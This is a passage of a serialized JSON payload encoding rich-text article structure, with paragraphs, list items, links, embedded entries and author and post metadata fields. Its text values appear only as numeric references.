},{"id":14143,"type":317,"linkType":318},[],{"nodeType":178,"data":35876,"content":35877},{},[35878,35881,35887],{"nodeType":173,"value":14149,"marks":35879,"data":35880},[],{},{"nodeType":186,"data":35882,"content":35883},{"uri":14017},[35884],{"nodeType":173,"value":14156,"marks":35885,"data":35886},[],{},{"nodeType":173,"value":197,"marks":35888,"data":35889},[],{},{"nodeType":231,"data":35891,"content":35892},{},[],{"nodeType":169,"data":35894,"content":35895},{},[35896],{"nodeType":173,"value":14169,"marks":35897,"data":35899},[35898],{"type":370},{},{"nodeType":178,"data":35901,"content":35902},{},[35903],{"nodeType":173,"value":14177,"marks":35904,"data":35905},[],{},{"nodeType":178,"data":35907,"content":35908},{},[35909],{"nodeType":173,"value":14184,"marks":35910,"data":35911},[],{},{"nodeType":178,"data":35913,"content":35914},{},[35915],{"nodeType":173,"value":14191,"marks":35916,"data":35917},[],{},{"nodeType":178,"data":35919,"content":35920},{},[35921],{"nodeType":173,"value":14198,"marks":35922,"data":35923},[],{},{"nodeType":312,"data":35925,"content":35928},{"target":35926},{"sys":35927},{"id":14205,"type":317,"linkType":318},[],{"nodeType":178,"data":35930,"content":35931},{},[35932,35935,35941],{"nodeType":173,"value":14211,"marks":35933,"data":35934},[],{},{"nodeType":186,"data":35936,"content":35937},{"uri":14216},[35938],{"nodeType":173,"value":14219,"marks":35939,"data":35940},[],{},{"nodeType":173,"value":197,"marks":35942,"data":35943},[],{},{"nodeType":231,"data":35945,"content":35946},{},[],{"nodeType":169,"data":35948,"content":35949},{},[35950],{"nodeType":173,"value":14232,"marks":35951,"data":35953},[35952],{"type":370},{},{"nodeType":178,"data":35955,"content":35956},{},[35957],{"nodeType":173,"value":14240,"marks":35958,"data":35959},[],{},{"nodeType":178,"data":35961,"content":35962},{},[35963,35966,35973,35976,35983,35986,35993,35996,36003],{"nodeType":173,"value":14247,"marks":35964,"data":35965},[],{},{"nodeType":186,"data":35967,"content":35968},{"uri":1842},[35969],{"nodeType":173,"value":1845,"marks":35970,"data":35972},[35971],{"type":194},{},{"nodeType":173,"value":14258,"marks":35974,"data":35975},[],{},{"nodeType":186,"data":35977,"content":35978},{"uri":14263},[35979],{"nodeType":173,"value":14266,"marks":35980,"data":35982},[35981],{"type":194},{},{"nodeType":173,"value":2936,"marks":35984,"data":35985},[],{},{"nodeType":186,"data":35987,"content":35988},{"uri":14275},[35989],{"nodeType":173,"value":14278,"marks":35990,"data":35992},[35991],{"type":194},{},{"nodeType":173,"value":9534,"marks":35994,"data":35995},[],{},{"nodeType":186,"data":35997,"content":35998},{"uri":14287},[35999],{"nodeType":173,"value":14290,"marks":36000,"data":36002},[36001],{"type":194},{},{"nodeType":173,"value":14295,"marks":36004,"data":36005},[],{},{"nodeType":178,"data":36007,"content":36008},{},[36009],{"nodeType":173,"value":14302,"marks":36010,"data":36011},[],{},{"nodeType":178,"data":36013,"content":36014},{},[36015],{"nodeType":173,"value":14309,"marks":36016,"data":36017},[],{},{"nodeType":231,"data":36019,"content":36020},{},[],{"nodeType":169,"data":36022,"content":36023},{},[36024],{"nodeType":173,"value":8517,"marks":36025,"data":36027},[36026],{"type":370},{},{"nodeType":178,"data":36029,"content":36030},{},[36031],{"nodeType":173,"value":14326,"marks":36032,"data":36033},[],{},{"nodeType":178,"data":36035,"content":36036},{},[36037],{"nodeType":173,"value":14333,"marks":36038,"data":36039},[],{},{"nodeType":178,"data":36041,"content":36042},{},[36043],{"nodeType":173,"value":14340,"marks":36044,"data":36045},[],{},{"nodeType":178,"data":36047,"content":36048},{},[36049,36052,36059,36062,36069],{"nodeType":173,"value":1451,"marks":36050,"data":36051},[],{},{"nodeType":186,"data":36053,"content":36054},{"uri":1456},[36055],{"nodeType":173,"value":1459,"marks":36056,"data":36058},[36057],{"type":194},{},{"nodeType":173,"value":1464,"marks":36060,"data":36061},[],{},{"nodeType":186,"data":36063,"content":36064},{"uri":1469},[36065],{"nodeType":173,"value":1472,"marks":36066,"data":36068},[36067],{"type":194},{},{"nodeType":173,"value":1477,"marks":36070,"data":36071},[],{},{"nodeType":231,"data":36073,"content":36074},{},[],{"nodeType":169,"data":36076,"content":36077},{},[36078],{"nodeType":173,"value":8406,"marks":36079,"data":36081},[36080],{"type":370},{},{"nodeType":178,"data":36083,"content":36084},{},[36085,36088,36095],{"nodeType":173,"value":8414,"marks":36086,"data":36087},[],{},{"nodeType":186,"data":36089,"content":36090},{"uri":8419},[36091],{"nodeType":173,"value":8422,"marks":36092,"data":36094},[36093],{"type":194},{},{"nodeType":173,"value":8427,"marks":36096,"data":36097},[],{},{"nodeType":178,"data":36099,"content":36100},{},[36101],{"nodeType":173,"value":14399,"marks":36102,"data":36103},[],{},{"nodeType":250,"data":36105,"content":36106},{},[36107,36116,36125,36134],{"nodeType":254,"data":36108,"content":36109},{},[36110],{"nodeType":178,"data":36111,"content":36112},{},[36113],{"nodeType":173,"value":14412,"marks":36114,"data":36115},[],{},{"nodeType":254,"data":36117,"content":36118},{},[36119],{"nodeType":178,"data":36120,"content":36121},{},[36122],{"nodeType":173,"value":14422,"marks":36123,"data":36124},[],{},{"nodeType":254,"data":36126,"content":36127},{},[36128],{"nodeType":178,"data":36129,"content":36130},{},[36131],{"nodeType":173,"value":14432,"marks":36132,"data":36133},[],{},{"nodeType":254,"data":36135,"content":36136},{},[36137],{"nodeType":178,"data":36138,"content":36139},{},[36140],{"nodeType":173,"value":14442,"marks":36141,"data":36142},[],{},{"nodeType":178,"data":36144,"content":36145},{},[36146],{"nodeType":173,"value":14449,"marks":36147,"data":36148},[],{},{"nodeType":250,"data":36150,"content":36151},{},[36152,36161,36170,36179],{"nodeType":254,"data":36153,"content":36154},{},[36155],{"nodeType":178,"data":36156,"content":36157},{},[36158],{"nodeType":173,"value":14462,"marks":36159,"data":36160},[],{},{"nodeType":254,"data":36162,"content":36163},{},[36164],{"nodeType":178,"data":36165,"content":36166},{},[36167],{"nodeType":173,"value":14472,"marks":36168,"data":36169},[],{},{"nodeType":254,"data":36171,"content":36172},{},[36173],{"nodeType":178,"data":36174,"content":36175},{},[36176],{"nodeType":173,"value":14482,"marks":36177,"data":36178},[],{},{"nodeType":254,"data":36180,"content":36181},{},[36182],{"nodeType":178,"data":36183,"content":36184},{},[36185],{"nodeType":173,"value":14492,"marks":36186,"data":36187},[],{},{"nodeType":178,"data":36189,"content":36190},{},[36191],{"nodeType":173,"value":14499,"marks":36192,"data":36193},[],{},{"nodeType":250,"data":36195,"content":36196},{},[36197,36206,36215,36224,36233,36242,36251],{"nodeType":254,"data":36198,"content":36199},{},[36200],{"nodeType":178,"data":36201,"content":36202},{},[36203],{"nodeType":173,"value":14512,"marks":36204,"data":36205},[],{},{"nodeType":254,"data":36207,"content":36208},{},[36209],{"nodeType":178,"data":36210,"content":36211},{},[36212],{"nodeType":173,"value":14522,"marks":36213,"data":36214},[],{},{"nodeType":254,"data":36216,"content":36217},{},[36218],{"nodeType":178,"data":36219,"content":36220},{},[36221],{"nodeType":173,"value":14532,"marks":36222,"data":36223},[],{},{"nodeType":254,"data":36225,"content":36226},{},[36227],{"nodeType":178,"data":36228,"content":36229},{},[36230],{"nodeType":173,"value":14542,"marks":36231,"data":36232},[],{},{"nodeType":254,"data":36234,"content":36235},{},[36236],{"nodeType":178,"data":36237,"content":36238},{},[36239],{"nodeType":173,"value":14552,"marks":36240,"data":36241},[],{},{"nodeType":254,"data":36243,"content":36244},{},[36245],{"nodeType":178,"data":36246,"content":36247},{},[36248],{"nodeType":173,"value":14562,"marks":36249,"data":36250},[],{},{"nodeType":254,"data":36252,"content":36253},{},[36254],{"nodeType":178,"data":36255,"content":36256},{},[36257],{"nodeType":173,"value":14572,"marks":36258,"data":36259},[],{},{"nodeType":178,"data":36261,"content":36262},{},[36263],{"nodeType":173,"value":14579,"marks":36264,"data":36266},[36265],{"type":370},{},{"items":36268},[36269,36271],{"sys":36270,"name":509},{"id":508},{"sys":36272,"name":505},{"id":504},{"items":36274},[36275],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":36276},{"url":1496},{"__typename":1528,"sys":36278,"content":36279,"title":25185,"synopsis":25186,"hashTags":118,"publishedDate":25187,"slug":25188,"tagsCollection":37400,"authorsCollection":37406},{"id":23904},{"json":36280},{"data":36281,"content":36282,"nodeType":165},{},[36283,36289,36295,36352,36358,36416,36421,36427,36433,36436,36442,36448,36454,36540,36555,36561,36598,36604,36610,36616,36646,36651,36678,36683,36689,36695,36725,36742,36745,36751,36757,36781,36787,36793,36799,36805,36811,36816,36829,36868,36873,36890,36893,36899,36905,36922,36928,36954,36971,36977,36994,37000,37006,37057,37063,37068,37081,37094,37111,37116,37133,37139,37142,37148,37154,37160,37166,37183,37189,37206,37211,37217,37247,37264,37267,37273,37279,37285,37302,37308,37321,37326,37332,37338,37355,37358,37364,37370,37376],{"data":36284,"content":36285,"nodeType":178},{},[36286],{"data":36287,"marks":36288,"value":23915,"nodeType":173},{},[],{"data":36290,"content":36291,"nodeType":178},{},[36292],{"data":36293,"marks":36294,"value":23922,"nodeType":173},{},[],{"data":36296,"content":36297,"nodeType":250},{},[36298,36316,36334],{"data":36299,"content":36300,"nodeType":254},{},[36301],{"data":36302,"content":36303,"nodeType":178},{},[36304,36307,36313],{"data":36305,"marks":36306,"value":23935,"nodeType":173},{},[],{"data":36308,"content":36309,"nodeType":186},{"uri":1252},[36310],{"data":36311,"marks":36312,"value":1255,"nodeType":173},{},[],{"data":36314,"marks":36315,"value":1260,"nodeType":173},{},[],{"data":36317,"content":36318,"nodeType":254},{},[36319],{"data":36320,"content":36321,"nodeType":178},{},[36322,36325,36331],{"data":36323,"marks":36324,"value":23954,"nodeType":173},{},[],{"data":36326,"content":36327,"nodeType":186},{"uri":1252},[36328],{"data":36329,"marks":36330,"value":1255,"nodeType":173},{},[],{"data":36332,"marks":36333,"value":1260,"nodeType":173},{},[],{"data":36335,"content":36336,"nodeType":254},{},[36337],{"data":36338,"content":36339,"nodeType":178},{},[36340,36343,36349],{"data":36341,"marks":36342,"value":23973,"nodeType":173},{},[],{"data":36344,"content":36345,"nodeType":186},{"uri":1275},[36346],{"data":36347,"marks":36348,"value":23980,"nodeType":173},{},[],{"data":36350,"marks":36351,"value":1260,"nodeType":173},{},[],{"data":36353,"content":36354,"nodeType":178},{},[36355],{"data":36356,"marks":36357,"value":23990,"nodeType":173},{},[],{"data":36359,"content":36360,"nodeType":250},{},[36361,36377,36400],{"data":36362,"content":36363,"nodeType":254},{},[36364],{"data":36365,"content":36366,"nodeType":178},{},[36367,36370,36374],{"data":36368,"marks":36369,"value":24003,"nodeType":173},{},[],{"data":36371,"marks":36372,"value":24008,"nodeType":173},{},[36373],{"type":370},{"data":36375,"marks":36376,"value":24012,"nodeType":173},{},[],{"data":36378,"content":36379,"nodeType":254},{},[36380],{"data":36381,"content":36382,"nodeType":178},{},[36383,36386,36390,36393,36397],{"data":36384,"marks":36385,"value":24022,"nodeType":173},{},[],{"data":36387,"marks":36388,"value":24027,"nodeType":173},{},[36389],{"type":370},{"data":36391,"marks":36392,"value":24031,"nodeType":173},{},[],{"data":36394,"marks":36395,"value":24036,"nodeType":173},{},[36396],{"type":370},{"data":36398,"marks":36399,"value":24040,"nodeType":173},{},[],{"data":36401,"content":36402,"nodeType":254},{},[36403],{"data":36404,"content":36405,"nodeType":178},{},[36406,36409,36413],{"data":36407,"marks":36408,"value":24050,"nodeType":173},{},[],{"data":36410,"marks":36411,"value":24055,"nodeType":173},{},[36412],{"type":370},{"data":36414,"marks":36415,"value":24059,"nodeType":173},{},[],{"data":36417,"content":36420,"nodeType":312},{"target":36418},{"sys":36419},{"id":24064,"type":317,"linkType":318},[],{"data":36422,"content":36423,"nodeType":178},{},[36424],{"data":36425,"marks":36426,"value":24072,"nodeType":173},{},[],{"data":36428,"content":36429,"nodeType":178},{},[36430],{"data":36431,"marks":36432,"value":24079,"nodeType":173},{},[],{"data":36434,"content":36435,"nodeType":231},{},[],{"data":36437,"content":36438,"nodeType":169},{},[36439],{"data":36440,"marks":36441,"value":24089,"nodeType":173},{},[],{"data":36443,"content":36444,"nodeType":235},{},[36445],{"data":36446,"marks":36447,"value":24096,"nodeType":173},{},[],{"data":36449,"content":36450,"nodeType":178},{},[36451],{"data":36452,"marks":36453,"value":24103,"nodeType":173},{},[],{"data":36455,"content":36456,"nodeType":250},{},[36457,36481,36516],{"data":36458,"content":36459,"nodeType":254},{},[36460],{"data":36461,"content":36462,"nodeType":178},{},[36463,36467,36470,36478],{"data":36464,"marks":36465,"value":24117,"nodeType":173},{},[36466],{"type":370},{"data":36468,"marks":36469,"value":24121,"nodeType":173},{},[],{"data":36471,"content":36474,"nodeType":1698},{"target":36472},{"sys":36473},{"id":24126,"type":317,"linkType":318},[36475],{"data":36476,"marks":36477,"value":24131,"nodeType":173},{},[],{"data":36479,"marks":36480,"value":24135,"nodeType":173},{},[],{"data":36482,"content":36483,"nodeType":254},{},[36484],{"data":36485,"content":36486,"nodeType":178},{},[36487,36491,36494,36502,36505,36513],{"data":36488,"marks":36489,"value":24146,"nodeType":173},{},[36490],{"type":370},{"data":36492,"marks":36493,"value":24150,"nodeType":173},{},[],{"data":36495,"content":36498,"nodeType":1698},{"target":36496},{"sys":36497},{"id":24155,"type":317,"linkType":318},[36499],{"data":36500,"marks":36501,"value":8046,"nodeType":173},{},[],{"data":36503,"marks":36504,"value":24163,"nodeType":173},{},[],{"data":36506,"content":36509,"nodeType":1698},{"target":36507},{"sys":36508},{"id":24168,"type":317,"linkType":318},[36510],{"data":36511,"marks":36512,"value":24173,"nodeType":173},{},[],{"data":36514,"marks":36515,"value":2340,"nodeType":173},{},[],{"data":36517,"content":36518,"nodeType":254},{},[36519],{"data":36520,"content":36521,"nodeType":178},{},[36522,36526,36529,36537],{"data":36523,"marks":36524,"value":24187,"nodeType":173},{},[36525],{"type":370},{"data":36527,"marks":36528,"value":24191,"nodeType":173},{},[],{"data":36530,"content":36533,"nodeType":1698},{"target":36531},{"sys":36532},{"id":24196,"type":317,"linkType":318},[36534],{"data":36535,"marks":36536,"value":24201,"nodeType":173},{},[],{"data":36538,"marks":36539,"value":24205,"nodeType":173},{},[],{"data":36541,"content":36542,"nodeType":178},{},[36543,36546,36552],{"data":36544,"marks":36545,"value":24212,"nodeType":173},{},[],{"data":36547,"content":36548,"nodeType":186},{"uri":24215},[36549],{"data":36550,"marks":36551,"value":24220,"nodeType":173},{},[],{"data":36553,"marks":36554,"value":24224,"nodeType":173},{},[],{"data":36556,"content":36557,"nodeType":178},{},[36558],{"data":36559,"marks":36560,"value":24231,"nodeType":173},{},[],{"data":36562,"content":36563,"nodeType":250},{},[36564,36573,36589],{"data":36565,"content":36566,"nodeType":254},{},[36567],{"data":36568,"content":36569,"nodeType":178},{},[36570],{"data":36571,"marks":36572,"value":24244,"nodeType":173},{},[],{"data":36574,"content":36575,"nodeType":254},{},[36576],{"data":36577,"content":36578,"nodeType":178},{},[36579,36582,36586],{"data":36580,"marks":36581,"value":24254,"nodeType":173},{},[],{"data":36583,"marks":36584,"value":24259,"nodeType":173},{},[36585],{"type":1646},{"data":36587,"marks":36588,"value":24263,"nodeType":173},{},[],{"data":36590,"content":36591,"nodeType":254},{},[36592],{"data":36593,"content":36594,"nodeType":178},{},[36595],{"data":36596,"marks":36597,"value":24273,"nodeType":173},{},[],{"data":36599,"content":36600,"nodeType":178},{},[36601],{"data":36602,"marks":36603,"value":24280,"nodeType":173},{},[],{"data":36605,"content":36606,"nodeType":235},{},[36607],{"data":36608,"marks":36609,"value":24287,"nodeType":173},{},[],{"data":36611,"content":36612,"nodeType":178},{},[36613],{"data":36614,"marks":36615,"value":24294,"nodeType":173},{},[],{"data":36617,"content":36618,"nodeType":250},{},[36619,36628,36637],{"data":36620,"content":36621,"nodeType":254},{},[36622],{"data":36623,"content":36624,"nodeType":178},{},[36625],{"data":36626,"marks":36627,"value":24307,"nodeType":173},{},[],{"data":36629,"content":36630,"nodeType":254},{},[36631],{"data":36632,"content":36633,"nodeType":178},{},[36634],{"data":36635,"marks":36636,"value":24317,"nodeType":173},{},[],{"data":36638,"content":36639,"nodeType":254},{},[36640],{"data":36641,"content":36642,"nodeType":178},{},[36643],{"data":36644,"marks":36645,"value":24327,"nodeType":173},{},[],{"data":36647,"content":36650,"nodeType":312},{"target":36648},{"sys":36649},{"id":24332,"type":317,"linkType":318},[],{"data":36652,"content":36653,"nodeType":178},{},[36654,36657,36661,36664,36668,36671,36675],{"data":36655,"marks":36656,"value":24340,"nodeType":173},{},[],{"data":36658,"marks":36659,"value":24345,"nodeType":173},{},[36660],{"type":370},{"data":36662,"marks":36663,"value":2936,"nodeType":173},{},[],{"data":36665,"marks":36666,"value":24353,"nodeType":173},{},[36667],{"type":370},{"data":36669,"marks":36670,"value":9534,"nodeType":173},{},[],{"data":36672,"marks":36673,"value":18640,"nodeType":173},{},[36674],{"type":370},{"data":36676,"marks":36677,"value":24364,"nodeType":173},{},[],{"data":36679,"content":36682,"nodeType":312},{"target":36680},{"sys":36681},{"id":18898,"type":317,"linkType":318},[],{"data":36684,"content":36685,"nodeType":178},{},[36686],{"data":36687,"marks":36688,"value":24376,"nodeType":173},{},[],{"data":36690,"content":36691,"nodeType":178},{},[36692],{"data":36693,"marks":36694,"value":24383,"nodeType":173},{},[],{"data":36696,"content":36697,"nodeType":250},{},[36698,36707,36716],{"data":36699,"content":36700,"nodeType":254},{},[36701],{"data":36702,"content":36703,"nodeType":178},{},[36704],{"data":36705,"marks":36706,"value":24396,"nodeType":173},{},[],{"data":36708,"content":36709,"nodeType":254},{},[36710],{"data":36711,"content":36712,"nodeType":178},{},[36713],{"data":36714,"marks":36715,"value":24406,"nodeType":173},{},[],{"data":36717,"content":36718,"nodeType":254},{},[36719],{"data":36720,"content":36721,"nodeType":178},{},[36722],{"data":36723,"marks":36724,"value":24416,"nodeType":173},{},[],{"data":36726,"content":36727,"nodeType":178},{},[36728,36731,36739],{"data":36729,"marks":36730,"value":24423,"nodeType":173},{},[],{"data":36732,"content":36735,"nodeType":1698},{"target":36733},{"sys":36734},{"id":24428,"type":317,"linkType":318},[36736],{"data":36737,"marks":36738,"value":24433,"nodeType":173},{},[],{"data":36740,"marks":36741,"value":1477,"nodeType":173},{},[],{"data":36743,"content":36744,"nodeType":231},{},[],{"data":36746,"content":36747,"nodeType":169},{},[36748],{"data":36749,"marks":36750,"value":24446,"nodeType":173},{},[],{"data":36752,"content":36753,"nodeType":235},{},[36754],{"data":36755,"marks":36756,"value":24096,"nodeType":173},{},[],{"data":36758,"content":36759,"nodeType":178},{},[36760,36763,36769,36772,36778],{"data":36761,"marks":36762,"value":24459,"nodeType":173},{},[],{"data":36764,"content":36765,"nodeType":186},{"uri":21131},[36766],{"data":36767,"marks":36768,"value":24466,"nodeType":173},{},[],{"data":36770,"marks":36771,"value":24470,"nodeType":173},{},[],{"data":36773,"content":36774,"nodeType":186},{"uri":21144},[36775],{"data":36776,"marks":36777,"value":24477,"nodeType":173},{},[],{"data":36779,"marks":36780,"value":24481,"nodeType":173},{},[],{"data":36782,"content":36783,"nodeType":178},{},[36784],{"data":36785,"marks":36786,"value":24488,"nodeType":173},{},[],{"data":36788,"content":36789,"nodeType":178},{},[36790],{"data":36791,"marks":36792,"value":24495,"nodeType":173},{},[],{"data":36794,"content":36795,"nodeType":178},{},[36796],{"data":36797,"marks":36798,"value":24502,"nodeType":173},{},[],{"data":36800,"content":36801,"nodeType":235},{},[36802],{"data":36803,"marks":36804,"value":24287,"nodeType":173},{},[],{"data":36806,"content":36807,"nodeType":178},{},[36808],{"data":36809,"marks":36810,"value":24515,"nodeType":173},{},[],{"data":36812,"content":36815,"nodeType":312},{"target":36813},{"sys":36814},{"id":24520,"type":317,"linkType":318},[],{"data":36817,"content":36818,"nodeType":178},{},[36819,36822,36826],{"data":36820,"marks":36821,"value":24528,"nodeType":173},{},[],{"data":36823,"marks":36824,"value":18640,"nodeType":173},{},[36825],{"type":370},{"data":36827,"marks":36828,"value":24536,"nodeType":173},{},[],{"data":36830,"content":36831,"nodeType":250},{},[36832,36841,36850,36859],{"data":36833,"content":36834,"nodeType":254},{},[36835],{"data":36836,"content":36837,"nodeType":178},{},[36838],{"data":36839,"marks":36840,"value":24549,"nodeType":173},{},[],{"data":36842,"content":36843,"nodeType":254},{},[36844],{"data":36845,"content":36846,"nodeType":178},{},[36847],{"data":36848,"marks":36849,"value":24559,"nodeType":173},{},[],{"data":36851,"content":36852,"nodeType":254},{},[36853],{"data":36854,"content":36855,"nodeType":178},{},[36856],{"data":36857,"marks":36858,"value":24569,"nodeType":173},{},[],{"data":36860,"content":36861,"nodeType":254},{},[36862],{"data":36863,"content":36864,"nodeType":178},{},[36865],{"data":36866,"marks":36867,"value":24579,"nodeType":173},{},[],{"data":36869,"content":36872,"nodeType":312},{"target":36870},{"sys":36871},{"id":21021,"type":317,"linkType":318},[],{"data":36874,"content":36875,"nodeType":178},{},[36876,36879,36887],{"data":36877,"marks":36878,"value":24591,"nodeType":173},{},[],{"data":36880,"content":36883,"nodeType":1698},{"target":36881},{"sys":36882},{"id":2215,"type":317,"linkType":318},[36884],{"data":36885,"marks":36886,"value":24600,"nodeType":173},{},[],{"data":36888,"marks":36889,"value":1477,"nodeType":173},{},[],{"data":36891,"content":36892,"nodeType":231},{},[],{"data":36894,"content":36895,"nodeType":169},{},[36896],{"data":36897,"marks":36898,"value":24613,"nodeType":173},{},[],{"data":36900,"content":36901,"nodeType":235},{},[36902],{"data":36903,"marks":36904,"value":24096,"nodeType":173},{},[],{"data":36906,"content":36907,"nodeType":178},{},[36908,36911,36919],{"data":36909,"marks":36910,"value":24626,"nodeType":173},{},[],{"data":36912,"content":36915,"nodeType":1698},{"target":36913},{"sys":36914},{"id":24631,"type":317,"linkType":318},[36916],{"data":36917,"marks":36918,"value":24636,"nodeType":173},{},[],{"data":36920,"marks":36921,"value":2340,"nodeType":173},{},[],{"data":36923,"content":36924,"nodeType":178},{},[36925],{"data":36926,"marks":36927,"value":24646,"nodeType":173},{},[],{"data":36929,"content":36930,"nodeType":178},{},[36931,36934,36942,36945,36951],{"data":36932,"marks":36933,"value":24653,"nodeType":173},{},[],{"data":36935,"content":36938,"nodeType":1698},{"target":36936},{"sys":36937},{"id":519,"type":317,"linkType":318},[36939],{"data":36940,"marks":36941,"value":6811,"nodeType":173},{},[],{"data":36943,"marks":36944,"value":24665,"nodeType":173},{},[],{"data":36946,"content":36947,"nodeType":186},{"uri":832},[36948],{"data":36949,"marks":36950,"value":835,"nodeType":173},{},[],{"data":36952,"marks":36953,"value":24675,"nodeType":173},{},[],{"data":36955,"content":36956,"nodeType":178},{},[36957,36960,36968],{"data":36958,"marks":36959,"value":24682,"nodeType":173},{},[],{"data":36961,"content":36964,"nodeType":1698},{"target":36962},{"sys":36963},{"id":3979,"type":317,"linkType":318},[36965],{"data":36966,"marks":36967,"value":24691,"nodeType":173},{},[],{"data":36969,"marks":36970,"value":24695,"nodeType":173},{},[],{"data":36972,"content":36973,"nodeType":235},{},[36974],{"data":36975,"marks":36976,"value":24287,"nodeType":173},{},[],{"data":36978,"content":36979,"nodeType":178},{},[36980,36983,36991],{"data":36981,"marks":36982,"value":24708,"nodeType":173},{},[],{"data":36984,"content":36987,"nodeType":1698},{"target":36985},{"sys":36986},{"id":24713,"type":317,"linkType":318},[36988],{"data":36989,"marks":36990,"value":24718,"nodeType":173},{},[],{"data":36992,"marks":36993,"value":24722,"nodeType":173},{},[],{"data":36995,"content":36996,"nodeType":178},{},[36997],{"data":36998,"marks":36999,"value":24729,"nodeType":173},{},[],{"data":37001,"content":37002,"nodeType":178},{},[37003],{"data":37004,"marks":37005,"value":24736,"nodeType":173},{},[],{"data":37007,"content":37008,"nodeType":250},{},[37009,37033],{"data":37010,"content":37011,"nodeType":254},{},[37012],{"data":37013,"content":37014,"nodeType":178},{},[37015,37019,37022,37030],{"data":37016,"marks":37017,"value":24750,"nodeType":173},{},[37018],{"type":370},{"data":37020,"marks":37021,"value":24754,"nodeType":173},{},[],{"data":37023,"content":37026,"nodeType":1698},{"target":37024},{"sys":37025},{"id":24759,"type":317,"linkType":318},[37027],{"data":37028,"marks":37029,"value":24764,"nodeType":173},{},[],{"data":37031,"marks":37032,"value":24768,"nodeType":173},{},[],{"data":37034,"content":37035,"nodeType":254},{},[37036],{"data":37037,"content":37038,"nodeType":178},{},[37039,37043,37046,37054],{"data":37040,"marks":37041,"value":24779,"nodeType":173},{},[37042],{"type":370},{"data":37044,"marks":37045,"value":24754,"nodeType":173},{},[],{"data":37047,"content":37050,"nodeType":1698},{"target":37048},{"sys":37049},{"id":24787,"type":317,"linkType":318},[37051],{"data":37052,"marks":37053,"value":24792,"nodeType":173},{},[],{"data":37055,"marks":37056,"value":24796,"nodeType":173},{},[],{"data":37058,"content":37059,"nodeType":178},{},[37060],{"data":37061,"marks":37062,"value":24803,"nodeType":173},{},[],{"data":37064,"content":37067,"nodeType":312},{"target":37065},{"sys":37066},{"id":24808,"type":317,"linkType":318},[],{"data":37069,"content":37070,"nodeType":178},{},[37071,37074,37078],{"data":37072,"marks":37073,"value":24816,"nodeType":173},{},[],{"data":37075,"marks":37076,"value":2600,"nodeType":173},{},[37077],{"type":370},{"data":37079,"marks":37080,"value":1477,"nodeType":173},{},[],{"data":37082,"content":37083,"nodeType":178},{},[37084,37087,37091],{"data":37085,"marks":37086,"value":5039,"nodeType":173},{},[],{"data":37088,"marks":37089,"value":2600,"nodeType":173},{},[37090],{"type":370},{"data":37092,"marks":37093,"value":24837,"nodeType":173},{},[],{"data":37095,"content":37096,"nodeType":178},{},[37097,37100,37108],{"data":37098,"marks":37099,"value":24844,"nodeType":173},{},[],{"data":37101,"content":37104,"nodeType":1698},{"target":37102},{"sys":37103},{"id":2405,"type":317,"linkType":318},[37105],{"data":37106,"marks":37107,"value":24853,"nodeType":173},{},[],{"data":37109,"marks":37110,"value":24857,"nodeType":173},{},[],{"data":37112,"content":37115,"nodeType":312},{"target":37113},{"sys":37114},{"id":24862,"type":317,"linkType":318},[],{"data":37117,"content":37118,"nodeType":178},{},[37119,37122,37130],{"data":37120,"marks":37121,"value":24870,"nodeType":173},{},[],{"data":37123,"content":37126,"nodeType":1698},{"target":37124},{"sys":37125},{"id":24875,"type":317,"linkType":318},[37127],{"data":37128,"marks":37129,"value":24880,"nodeType":173},{},[],{"data":37131,"marks":37132,"value":24884,"nodeType":173},{},[],{"data":37134,"content":37135,"nodeType":178},{},[37136],{"data":37137,"marks":37138,"value":24891,"nodeType":173},{},[],{"data":37140,"content":37141,"nodeType":231},{},[],{"data":37143,"content":37144,"nodeType":169},{},[37145],{"data":37146,"marks":37147,"value":24901,"nodeType":173},{},[],{"data":37149,"content":37150,"nodeType":235},{},[37151],{"data":37152,"marks":37153,"value":24096,"nodeType":173},{},[],{"data":37155,"content":37156,"nodeType":178},{},[37157],{"data":37158,"marks":37159,"value":24914,"nodeType":173},{},[],{"data":37161,"content":37162,"nodeType":178},{},[37163],{"data":37164,"marks":37165,"value":24921,"nodeType":173},{},[],{"data":37167,"content":37168,"nodeType":178},{},[37169,37172,37180],{"data":37170,"marks":37171,"value":24928,"nodeType":173},{},[],{"data":37173,"content":37176,"nodeType":1698},{"target":37174},{"sys":37175},{"id":24933,"type":317,"linkType":318},[37177],{"data":37178,"marks":37179,"value":24938,"nodeType":173},{},[],{"data":37181,"marks":37182,"value":24942,"nodeType":173},{},[],{"data":37184,"content":37185,"nodeType":235},{},[37186],{"data":37187,"marks":37188,"value":24287,"nodeType":173},{},[],{"data":37190,"content":37191,"nodeType":178},{},[37192,37195,37203],{"data":37193,"marks":37194,"value":24955,"nodeType":173},{},[],{"data":37196,"content":37199,"nodeType":1698},{"target":37197},{"sys":37198},{"id":2489,"type":317,"linkType":318},[37200],{"data":37201,"marks":37202,"value":24964,"nodeType":173},{},[],{"data":37204,"marks":37205,"value":24968,"nodeType":173},{},[],{"data":37207,"content":37210,"nodeType":312},{"target":37208},{"sys":37209},{"id":18589,"type":317,"linkType":318},[],{"data":37212,"content":37213,"nodeType":178},{},[37214],{"data":37215,"marks":37216,"value":24980,"nodeType":173},{},[],{"data":37218,"content":37219,"nodeType":250},{},[37220,37229,37238],{"data":37221,"content":37222,"nodeType":254},{},[37223],{"data":37224,"content":37225,"nodeType":178},{},[37226],{"data":37227,"marks":37228,"value":24993,"nodeType":173},{},[],{"data":37230,"content":37231,"nodeType":254},{},[37232],{"data":37233,"content":37234,"nodeType":178},{},[37235],{"data":37236,"marks":37237,"value":25003,"nodeType":173},{},[],{"data":37239,"content":37240,"nodeType":254},{},[37241],{"data":37242,"content":37243,"nodeType":178},{},[37244],{"data":37245,"marks":37246,"value":25013,"nodeType":173},{},[],{"data":37248,"content":37249,"nodeType":178},{},[37250,37253,37261],{"data":37251,"marks":37252,"value":25020,"nodeType":173},{},[],{"data":37254,"content":37257,"nodeType":1698},{"target":37255},{"sys":37256},{"id":2489,"type":317,"linkType":318},[37258],{"data":37259,"marks":37260,"value":24600,"nodeType":173},{},[],{"data":37262,"marks":37263,"value":1477,"nodeType":173},{},[],{"data":37265,"content":37266,"nodeType":231},{},[],{"data":37268,"content":37269,"nodeType":169},{},[37270],{"data":37271,"marks":37272,"value":25041,"nodeType":173},{},[],{"data":37274,"content":37275,"nodeType":235},{},[37276],{"data":37277,"marks":37278,"value":24096,"nodeType":173},{},[],{"data":37280,"content":37281,"nodeType":178},{},[37282],{"data":37283,"marks":37284,"value":25054,"nodeType":173},{},[],{"data":37286,"content":37287,"nodeType":178},{},[37288,37291,37299],{"data":37289,"marks":37290,"value":25061,"nodeType":173},{},[],{"data":37292,"content":37295,"nodeType":1698},{"target":3729